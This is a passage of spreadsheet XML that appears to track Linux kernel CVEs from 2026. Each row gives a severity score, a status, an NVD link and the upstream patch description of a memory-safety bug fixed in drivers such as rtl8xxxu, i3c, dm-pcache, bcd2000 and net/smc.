    rx_anchor through rtl8xxxu_submit_rx_urb().  A worker still running
    when usb_kill_anchored_urbs(&amp;priv-&gt;rx_anchor) returned would submit a
    URB that escaped the kill.  In rtl8xxxu_stop(), call
    cancel_work_sync(&amp;priv-&gt;rx_urb_wq) before the kill so the worker is
    drained first.
After priv-&gt;shutdown is set under rx_urb_lock, completions can no longer
queue rx_urb_wq. cancel_work_sync() then drains the last queued or running
worker, and the following usb_kill_anchored_urbs() kills the URBs it may
have submitted.
rtl8xxxu_disconnect() is covered because ieee80211_unregister_hw()
guarantees .stop() runs for a live interface before ieee80211_free_hw()
frees priv.  The probe error path needs no cancel: rx_urb_wq is
INIT_WORK()'d there but cannot have been scheduled, since no URB is
submitted before ieee80211_register_hw() succeeds.
This bug was found by static analysis.</t>
        </is>
      </c>
      <c r="S323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80947</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80950</t>
        </is>
      </c>
      <c r="D324" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F324" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr"/>
      <c r="K324" s="5" t="inlineStr"/>
      <c r="L324" s="5" t="inlineStr"/>
      <c r="M324" s="5" t="inlineStr"/>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr"/>
      <c r="Q324" s="5" t="inlineStr"/>
      <c r="R324" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i3c: renesas: Check that the transfer is valid before accessing it
The Renesas I3C driver uses an asynchronous model to transfer data. It
prepares a struct renesas_i3c_xfer, enqueues it, and waits for completion.
The interrupt handler dequeues the transfer, updates/uses it, and signals
the waiting thread.
If the completion times out, the waiting thread dequeues the transfer and
free it. If an interrupt fires after that, the handler may access freed
memory, leading to crashes.
Check that the transfer is still valid before accessing it in the
interrupt handler. With it clear any status flags and disable all
the interrupts to avoid triggering the same interrupts again.</t>
        </is>
      </c>
      <c r="S324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80950</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80952</t>
        </is>
      </c>
      <c r="D325" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F325" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr"/>
      <c r="K325" s="5" t="inlineStr"/>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr"/>
      <c r="Q325" s="5" t="inlineStr"/>
      <c r="R325" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i3c: master: Fix info leak and UAF in device unregister path
i3c_master_unregister_i3c_devs() clears i3cdev-&gt;dev-&gt;desc before
calling device_unregister().  During device_unregister(),
device_del() emits a KOBJ_REMOVE uevent and unbinds the driver while
the device descriptor is still expected to be valid.  As a result,
i3c_device_uevent() and a racing modalias_show() can observe a NULL
desc and fall back to an uninitialized stack struct i3c_device_info,
leaking kernel stack contents in the generated modalias.  Driver
.remove() callbacks may also encounter an unexpected NULL desc during
unbind.
Keep desc valid until device_unregister() has completed.  Since
device_unregister() drops the device reference and may free the device,
take an extra reference with get_device() before unregistering.  Clear
desc afterwards and release the extra reference with put_device().
This preserves the release-time invariant that desc must be NULL while
avoiding both the information leak and a potential use-after-free from
writing desc after the device has been released.</t>
        </is>
      </c>
      <c r="S325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80952</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80954</t>
        </is>
      </c>
      <c r="D326" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F326" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr"/>
      <c r="K326" s="5" t="inlineStr"/>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr"/>
      <c r="Q326" s="5" t="inlineStr"/>
      <c r="R326" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i3c: Fix unlocked dereference of dev-&gt;desc in i3c_device_get_supported_xfer_mode()
i3c_device_get_supported_xfer_mode() uses dev-&gt;desc to obtain the
master controller.  However, dev-&gt;desc must not be dereferenced unless
bus-&gt;lock is held, and this function does not take that lock.
The function only needs access to the master controller associated with
the device's bus.  Use dev-&gt;bus instead, which is always valid for the
lifetime of the device and does not require dereferencing dev-&gt;desc.</t>
        </is>
      </c>
      <c r="S326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80954</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80955</t>
        </is>
      </c>
      <c r="D327" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F327" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr"/>
      <c r="K327" s="5" t="inlineStr"/>
      <c r="L327" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr"/>
      <c r="Q327" s="5" t="inlineStr"/>
      <c r="R327" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-pcache: fix use-after-free and invalid seg operations in kset_replay()
In kset_replay, when key-&gt;seg_gen is stale (key-&gt;seg_gen &lt;
key-&gt;cache_pos.cache_seg-&gt;gen), cache_key_put(key) is called but then
key-&gt;cache_pos.cache_seg is accessed as the argument to cache_seg_get().
This is a use-after-free on the freed key memory. Although mempool
recycled memory is not immediately reclaimed or overwritten in practice,
this is still a potential UAF bug.
Additionally, for expired invalid keys, setting the cache-&gt;seg_map bit
and calling cache_seg_get() is unreasonable since the corresponding
segment data is no longer valid.
Fix both issues by moving cache_seg_get() and __set_bit() after the
gen check, so they only execute for valid keys, and using continue to
skip invalid keys.</t>
        </is>
      </c>
      <c r="S327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80955</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80959</t>
        </is>
      </c>
      <c r="D328" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F328" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr"/>
      <c r="K328" s="5" t="inlineStr"/>
      <c r="L328" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr"/>
      <c r="Q328" s="5" t="inlineStr"/>
      <c r="R328" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-pcache: bound the persisted tail-position offset
cache_pos_decode() takes the persisted key_tail and dirty_tail seg_off from
the cache device and addresses within the segment with it. A seg_off at or
past the segment data_size, controllable by whoever supplies the device
(CAP_SYS_ADMIN), reads past the segment data.
Reject a decoded seg_off that is not below the segment data_size.</t>
        </is>
      </c>
      <c r="S328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80959</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80961</t>
        </is>
      </c>
      <c r="D329" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F329" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr"/>
      <c r="K329" s="5" t="inlineStr"/>
      <c r="L329" s="5" t="inlineStr"/>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr"/>
      <c r="Q329" s="5" t="inlineStr"/>
      <c r="R329" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-pcache: validate kset key_num and intra-segment bounds
Two more fields decoded from the cache device go unbounded. The kset
key_num drives cache_kset_crc() and the replay loop in cache_replay(),
the writeback worker and the GC worker, but only the magic and a
fixed-seed CRC are checked first, so a non-last kset whose key_num exceeds
the PCACHE_KSET_KEYS_MAX buffer reads past its end before the CRC compare.
A key's intra-segment offset and length in cache_key_decode() are taken
verbatim, so a key running past its segment is replayed into the cache
tree and the data CRC check and every later read hit then copy adjacent
persistent memory into the caller's bio -- an out-of-bounds read that
leaks to user space. Both fields are controlled by whoever supplies the
cache device (CAP_SYS_ADMIN); the CRC seed is public.
Add kset_onmedia_valid() to bound key_num before any kset read, and
reject a key whose offset plus length, computed in 64 bits, exceeds the
segment data_size. Valid metadata is unaffected.</t>
        </is>
      </c>
      <c r="S329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80961</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80962</t>
        </is>
      </c>
      <c r="D330" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F330" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr"/>
      <c r="K330" s="5" t="inlineStr"/>
      <c r="L330" s="5" t="inlineStr"/>
      <c r="M330" s="5" t="inlineStr"/>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr"/>
      <c r="Q330" s="5" t="inlineStr"/>
      <c r="R330" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-pcache: validate geometry fields from on-disk cache_info
cache_segs_init() iterates cache_info-&gt;n_segs times indexing
cache-&gt;segments[], which is sized to the cache device geometry, and
get_seg_id() takes each segment id from the on-media cache_info and the
per-segment next_seg link. Both come from cache device metadata that is
only CRC-protected with a fixed public seed, so whoever supplies the
cache device on a table load (CAP_SYS_ADMIN) controls them: an oversized
n_segs or an out-of-range id drives an out-of-bounds access of
cache-&gt;segments[] and a wild CACHE_DEV_SEGMENT() pointer into the device
mapping -- an out-of-bounds read and write from on-disk data.
Reject an n_segs that exceeds the device segment count and a segment id
that is out of range before either is used. Valid metadata is unaffected.</t>
        </is>
      </c>
      <c r="S330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80962</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80971</t>
        </is>
      </c>
      <c r="D331" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F331" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr"/>
      <c r="K331" s="5" t="inlineStr"/>
      <c r="L331" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr"/>
      <c r="Q331" s="5" t="inlineStr"/>
      <c r="R331" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: bcd2000: clear the URB pointers on disconnect
bcd2000_free_usb_related_resources() frees both URBs and leaves the
pointers behind:
	usb_kill_urb(bcd2k-&gt;midi_out_urb);
	usb_kill_urb(bcd2k-&gt;midi_in_urb);
	usb_free_urb(bcd2k-&gt;midi_out_urb);
	usb_free_urb(bcd2k-&gt;midi_in_urb);
The rawmidi device outlives that call.  A substream that is still open
when the device is unplugged reaches bcd2000_midi_send() from the
trigger path on close.  That function writes to the freed URB and then
hands it to the USB core:
	bcd2k-&gt;midi_out_urb-&gt;transfer_buffer_length = BUFSIZE;
	...
	ret = usb_submit_urb(bcd2k-&gt;midi_out_urb, GFP_ATOMIC);
usb_kill_urb() does not stop a later submission either, so a submit that
races the disconnect can requeue the URB after it has been reaped.
midi_in_urb is exposed the same way: bcd2000_input_complete() resubmits
it from the completion handler.
KASAN on 7.2.0-rc5 (arm64):
  BUG: KASAN: slab-use-after-free in bcd2000_midi_send [snd_bcd2000]
  Write of size 4 at addr ffff00001827d388 by task bpoc/168
   __asan_store4
   bcd2000_midi_send [snd_bcd2000]
   bcd2000_midi_output_trigger [snd_bcd2000]
   snd_rawmidi_kernel_write1
   close_substream.part.0
  Freed by task 168:
   usb_free_urb
   bcd2000_disconnect [snd_bcd2000]
  BUG: KASAN: slab-use-after-free in usb_submit_urb
  Read of size 8 at addr ffff00001827d3b8 by task bpoc/168
Clear both pointers after freeing and test them on the paths that can
still run.  Poison the URBs before freeing them: usb_poison_urb() waits
for a running completion handler and rejects any later submission, so
after it returns the input path is quiesced and only the rawmidi trigger
path can still reach bcd2000_midi_send().  No unpoison is needed; the
URBs are freed on the next line.
Discovered by XBOW, triaged by Baul Lee &lt;baul.lee@xbow.com&gt;</t>
        </is>
      </c>
      <c r="S331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80971</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80975</t>
        </is>
      </c>
      <c r="D332" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F332" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr"/>
      <c r="K332" s="5" t="inlineStr"/>
      <c r="L332" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr"/>
      <c r="Q332" s="5" t="inlineStr"/>
      <c r="R332" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mfd: qnap-mcu: keep the reply buffer alive past a command timeout
qnap_mcu_exec() publishes an on-stack buffer to the receive path:
	unsigned char rx[QNAP_MCU_RX_BUFFER_SIZE];
	...
	reply-&gt;data = rx;
	reply-&gt;length = length;
and qnap_mcu_receive_buf() writes into it from the serdev receive path,
which runs out of flush_to_ldisc() and is not serialized against
qnap_mcu_exec() at all. bus_lock cannot cover it, because qnap_mcu_exec()
holds that mutex across wait_for_completion_timeout().
On a timeout qnap_mcu_exec() returns with reply-&gt;data still pointing at
its own frame. A reply that arrives late, or an unsolicited message from
the MCU, is then written into a stack frame that has been left, corrupting
whatever runs next on that stack. The same applies when qnap_mcu_write()
fails, since that path returns without touching the reply state either.
Move the receive buffer into struct qnap_mcu. It is 37 bytes and the
structure is devm_kzalloc()ed, so it lives as long as the driver, and a
late write lands in memory that is still valid and is reinitialized by the
next command. bus_lock keeps commands from sharing it.
This deliberately does not clear reply-&gt;data or reply-&gt;length on the
timeout path. Doing so races with qnap_mcu_receive_buf(), which reads both
after its
	if (!reply-&gt;length)
		return size;
check: clearing reply-&gt;data gives a NULL dereference, and clearing
reply-&gt;length alone removes the reply-&gt;received == reply-&gt;length exit
condition, so the copy loop runs until the uart chunk is consumed and
overruns the buffer. Leaving both set keeps the write bounded by
reply-&gt;length, which qnap_mcu_exec() has already checked against
sizeof(mcu-&gt;rx).</t>
        </is>
      </c>
      <c r="S332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80975</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80977</t>
        </is>
      </c>
      <c r="D333" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F333" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr"/>
      <c r="K333" s="5" t="inlineStr"/>
      <c r="L333" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr"/>
      <c r="Q333" s="5" t="inlineStr"/>
      <c r="R333" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: skbuff: don't touch shared zerocopy state in skb_tx_error()
skb_tx_error() completes the zerocopy uarg and clears
SKBFL_ALL_ZEROCOPY, and skb_zcopy_downgrade_managed() clears
SKBFL_MANAGED_FRAG_REFS. Both live in skb_shinfo(), which every clone
shares, while the caller only owns the reference it is about to drop.
Through a clone it tells the producer its pages are free and drops
SKBFL_SHARED_FRAG for an skb that is still in flight.
Open vSwitch reaches this with a non-last OVS_ACTION_ATTR_RECIRC:
clone_execute() sends a skb_clone() into ovs_dp_process_packet() while
do_execute_actions() keeps forwarding the original, and skb_clone()
does not privatise the frags here -- skb_orphan_frags() returns early
on SKBFL_DONT_ORPHAN. A flow miss on the clone then strips the marker
from the packet still being forwarded, and a later local ESP delivery
decrypts in place over frags it does not own privately.
Skip it for a cloned skb. Nothing is lost: skb_release_data() clears
the zerocopy state once the last reference to the shared data goes.</t>
        </is>
      </c>
      <c r="S333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80977</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80978</t>
        </is>
      </c>
      <c r="D334" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F334" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr"/>
      <c r="K334" s="5" t="inlineStr"/>
      <c r="L334" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr"/>
      <c r="Q334" s="5" t="inlineStr"/>
      <c r="R334" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: cap advertised IP tunnel headroom
IP tunnel devices derive their advertised needed_headroom from lower
output devices. A stack of user-created devices can make the derived
value larger than the 16-bit skb header offsets can represent. Once IP
output reserves it, skb head expansion can wrap those offsets.
The runtime transmit path already caps a growing needed_headroom at 512.
Apply the same cap when tunnel configuration publishes needed_headroom
derived from a lower output device.
Capping the advertised value is safe: IP tunnel transmit still expands
the skb when a packet needs more headroom. A nonsensical stacked
configuration can therefore incur an extra reallocation, but it cannot
publish an unbounded reservation to upper layers.</t>
        </is>
      </c>
      <c r="S334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80978</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80979</t>
        </is>
      </c>
      <c r="D335" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F335" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr"/>
      <c r="K335" s="5" t="inlineStr"/>
      <c r="L335" s="5" t="inlineStr"/>
      <c r="M335" s="5" t="inlineStr"/>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr"/>
      <c r="Q335" s="5" t="inlineStr"/>
      <c r="R335" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/smc: unregister the connection before draining the rx tasklet
smc_conn_free() calls smc_ism_unset_conn() only while the link group is
still on its device list, and never sets conn-&gt;killed.
smc_lgr_terminate_sched() unlinks the group immediately and defers killing
its connections to a work item, so a connection freed in that window keeps
its smcd-&gt;conn[] slot with both gates in smcd_handle_irq() open, and the
device can re-arm the receive tasklet after tasklet_kill() has returned. On
the DMB-nocopy path the ghost send buffer is freed right after that drain,
so the re-armed tasklet dereferences it.
Unregister unconditionally and drain before the detach at both teardown
sites, mirroring rmb_desc, which smc_buf_unuse() releases after the drain.
Clear conn-&gt;sndbuf_desc before freeing it as well, so a reader that samples
the pointer cannot get one that is already freed.</t>
        </is>
      </c>
      <c r="S335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80979</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80982</t>
        </is>
      </c>
      <c r="D336" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F336" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr"/>
      <c r="K336" s="5" t="inlineStr"/>
      <c r="L336" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr"/>
      <c r="Q336" s="5" t="inlineStr"/>
      <c r="R336" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/smc: fix use-after-free in smc_rx_pipe_buf_release()
smc_rx_splice() hands RMB pages to a pipe and takes a socket reference
